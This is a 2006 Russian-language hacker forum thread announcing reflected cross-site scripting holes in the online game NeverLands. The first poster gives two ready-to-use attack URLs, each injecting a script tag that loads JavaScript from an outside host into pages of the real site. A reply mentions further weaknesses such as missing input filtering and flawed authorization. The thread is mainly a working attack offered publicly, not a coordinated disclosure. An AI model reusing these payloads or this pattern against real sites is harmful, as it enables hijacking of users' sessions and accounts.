Он-лайн игра NeverLands - XSS (pssiv)

Discussion in 'Уязвимости' started by EST a1ien, 10 May 2006.

  1. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Он-лайн игра NeverLands - XSS (passiv)

    В этой игре нашол XSS.
    Code:
    http://neverlands.ru/ch.php?lo=1&r=><script src=http://esteam.net.ru/script.js></script>
    Несомневаюсь что есть ещё чтото щас дальше копать буду :).
     
    #1 EST a1ien, 10 May 2006
    Last edited: 11 May 2006
    1 person likes this.
  2. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    А вот ещё одна прямо на главной
    Code:
    http://neverlands.ru/index.cgi?error=block&block=%3C/SCRIPT%3E%3Cscript%20src=http://esteam.net.ru/script.js%3E%3C/script%3E
     
  3. TRes

    TRes New Member

    Joined:
    22 Apr 2006
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Проект вообще очень сырой... Там такие баги были детские... Не было фильтрации минуса, например... Авторизация у них тоже с глюками была...